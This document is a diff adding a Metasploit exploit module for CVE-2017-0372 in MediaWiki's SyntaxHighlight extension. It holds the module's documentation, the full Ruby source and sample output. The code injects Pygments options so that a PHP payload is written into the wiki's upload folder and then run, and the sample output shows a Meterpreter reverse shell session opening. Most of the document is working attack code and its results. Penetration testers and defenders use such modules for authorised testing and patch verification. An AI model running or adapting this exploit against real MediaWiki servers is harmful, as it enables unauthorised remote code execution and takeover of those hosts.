Land rapid7#8319, Add exploit module for Mediawiki SyntaxHighlight extension

Author: wchen-r7

documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md

@@ -0,0 +1,77 @@
+## Vulnerable Application
+
+  Any MediaWiki installation with SyntaxHighlight version 2.0 installed & enabled. This extension ships with the AIO package of MediaWiki 1.27.x & 1.28.x. A fix for this issue is included in MediaWiki version 1.28.2 and version 1.27.3.
+
+## Vulnerable Setup
+
+To set up the vulnerable environment, please do:
+
+  1. Download [MediaWiki (such as 1.28.0)](https://releases.wikimedia.org/mediawiki/1.28/mediawiki-1.28.0.tar.gz)
+  2. Install MediaWiki on a LAMP setup (ideally)
+  3. Install composer ```curl -sS https://getcomposer.org/installer | sudo php -- --install-dir=/usr/local/bin --filename=composer```
+  4. Do: ```cd /var/www/html/mediawiki/extensions/SyntaxHighlight_GeSHi```
+  5. Do: ```composer update```
+  6. Open your LocalSettings.php with a text editor, and add this line at the end of the file: ```wfLoadExtension( 'SyntaxHighlight_GeSHi' );```
+
+  At this point, you are ready to test this setup. 
+
+## Verification Steps
+
+  1. `use exploit/multi/http/mediawiki_syntaxhighlight`
+  2. `set RHOST [ip target site]`
+  3. `set TARGETURI [MediaWiki path]`
+  4. `set UPLOADPATH [writable path in web root]`
+  5. optionally set `RPORT`, `SSL`, and `VHOST`
+  6. `exploit`
+  7. **Verify** a new Meterpreter session is started
+  
+## Options
+
+  **TARGETURI**
+
+  The MediaWiki base path, the URL path on which MediaWiki is exposed. This is normally `/mediawiki`, `/wiki`, or `/w`.
+
+  **UPLOADPATH**
+
+  Folder name where MediaWiki stores the uploads, make sure to use a relative path here. For a regular installation this is the `images` folder. This folder needs to be writable by MediaWiki and accessible from the web root. The exploit will try to create a PHP file in this location that will later be called through the web server.
+
+  **CLEANUP**
+
+  Set this to true (the default) to unlink the PHP file created by this exploit module. The cleanup code will only be called when the exploit is successful.
+
+  **USERNAME**
+
+  In case the wiki is configured as private, a read-only (or better) account is needed to exploit this issue. Provide the username of that account here.
+
+  **PASSWORD**
+
+  In case the wiki is configured as private, a read-only (or better) account is needed to exploit this issue. Provide the password of that account here.
+
+## Sample Output
+
+### The Check command
+
+The module comes with a check command that allows you to check whether the target might be
+vulnerable or not, for example:
+
+```
+msf exploit(mediawiki_syntaxhighlight) > check
+[*] 192.168.146.203:80 The target appears to be vulnerable.
+```
+
+### MediaWiki 1.27.1-2 on Ubuntu 16.10
+
+```
+msf > use exploit/multi/http/mediawiki_syntaxhighlight 
+msf exploit(mediawiki_syntaxhighlight) > set RHOST 192.168.146.137
+RHOST => 192.168.146.137
+msf exploit(mediawiki_syntaxhighlight) > set TARGETURI /mediawiki
+TARGETURI => /mediawiki
+msf exploit(mediawiki_syntaxhighlight) > exploit
+
+[*] Started reverse TCP handler on 192.168.146.197:4444 
+[*] Local PHP file: images/bwpqtiqgmeydivskjcjltnldb.php
+[*] Trying to run /mediawiki/images/bwpqtiqgmeydivskjcjltnldb.php
+[*] Sending stage (33986 bytes) to 192.168.146.137
+[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.137:55768) at 2017-04-29 14:27:03 +0200
+```

modules/exploits/multi/http/mediawiki_syntaxhighlight.rb

@@ -0,0 +1,162 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'MediaWiki SyntaxHighlight extension option injection vulnerability',
+      'Description'    => %q{
+        This module exploits an option injection vulnerability in the SyntaxHighlight
+        extension of MediaWiki. It tries to create & execute a PHP file in the document root.
+        The USERNAME & PASSWORD options are only needed if the Wiki is configured as private.
+
+        This vulnerability affects any MediaWiki installation with SyntaxHighlight version 2.0
+        installed & enabled. This extension ships with the AIO package of MediaWiki version
+        1.27.x & 1.28.x. A fix for this issue is included in MediaWiki version 1.28.2 and
+        version 1.27.3.
+      },
+      'Author' => 'Yorick Koster',
+      'License' => MSF_LICENSE,
+      'Platform' => 'php',
+      'Payload' => { 'BadChars' => "#{(0x1..0x1f).to_a.pack('C*')} ,'\"" } ,
+      'References' =>
+        [
+          [ 'CVE', '2017-0372' ],
+          [ 'URL', 'https://lists.wikimedia.org/pipermail/mediawiki-announce/2017-April/000207.html' ],
+          [ 'URL', 'https://phabricator.wikimedia.org/T158689' ],
+          [ 'URL', 'https://securify.nl/advisory/SFY20170201/syntaxhighlight_mediawiki_extension_allows_injection_of_arbitrary_pygments_options.html' ]
+        ],
+      'Arch' => ARCH_PHP,
+      'Targets' =>
+        [
+          ['Automatic Targeting', { 'auto' => true }  ],
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Apr 06 2017'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "MediaWiki base path (eg, /w, /wiki, /mediawiki)", '/wiki' ]),
+        OptString.new('UPLOADPATH', [ true, "Relative local upload path", 'images' ]),
+        OptString.new('USERNAME', [ false, "Username to authenticate with", '' ]),
+        OptString.new('PASSWORD', [ false, "Password to authenticate with", '' ]),
+        OptBool.new('CLEANUP', [ false, "Delete created PHP file?", true ])
+      ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api.php'),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'action' => 'parse',
+        'format' => 'json',
+        'contentmodel' => 'wikitext',
+        'text' => '<syntaxhighlight lang="java" start="0,full=1"></syntaxhighlight>'
+      }
+    })
+
+    if(res && res.headers.key?('MediaWiki-API-Error'))
+      if(res.headers['MediaWiki-API-Error'] == 'internal_api_error_MWException')
+        return Exploit::CheckCode::Appears
+      elsif(res.headers['MediaWiki-API-Error'] == 'readapidenied')
+        print_error("Login is required")
+      end
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  # use deprecated interface
+  def login
+    print_status("Trying to login....")
+    # get login token
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api.php'),
+      'vars_post' => {
+        'action' => 'login',
+        'format' => 'json',
+        'lgname' => datastore['USERNAME']
+      }
+    })
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out')
+    end
+    json = res.get_json_document
+    if json.empty? || !json['login'] || !json['login']['token']
+      fail_with(Failure::Unknown, 'Server returned an invalid response')
+    end
+    logintoken = json['login']['token']
+    @cookie = res.get_cookies
+
+    # login
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api.php'),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'action' => 'login',
+        'format' => 'json',
+        'lgname' => datastore['USERNAME'],
+        'lgpassword' => datastore['PASSWORD'],
+        'lgtoken' => logintoken
+      }
+    })
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out')
+    end
+    json = res.get_json_document
+    if json.empty? || !json['login'] || !json['login']['result']
+      fail_with(Failure::Unknown, 'Server returned an invalid response')
+    end
+    if json['login']['result'] == 'Success'
+      @cookie = res.get_cookies
+    else
+      fail_with(Failure::Unknown, 'Failed to login')
+    end
+  end
+
+  def exploit
+    @cookie = ''
+    if datastore['USERNAME'] && datastore['USERNAME'].length > 0
+      login
+    end
+
+    check_code = check
+    unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
+      fail_with(Failure::NoTarget, "#{peer}")
+    end
+
+    phpfile = "#{rand_text_alpha_lower(25)}.php"
+    cssfile = "#{datastore['UPLOADPATH']}/#{phpfile}"
+    cleanup = "unlink(\"#{phpfile}\");"
+    if not datastore['CLEANUP']
+      cleanup = ""
+    end
+    print_status("Local PHP file: #{cssfile}")
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api.php'),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'action' => 'parse',
+        'format' => 'json',
+        'contentmodel' => 'wikitext',
+        'text' => "<syntaxhighlight lang='java' start='0,full=1,cssfile=#{cssfile},classprefix=&lt;?php #{cleanup}#{payload.encoded} exit;?&gt;'></syntaxhighlight>"
+      }
+    })
+    if res
+      print_status("Trying to run #{normalize_uri(target_uri.path, cssfile)}")
+      send_request_cgi({'uri' => normalize_uri(target_uri.path, cssfile)})
+    end
+  end
+end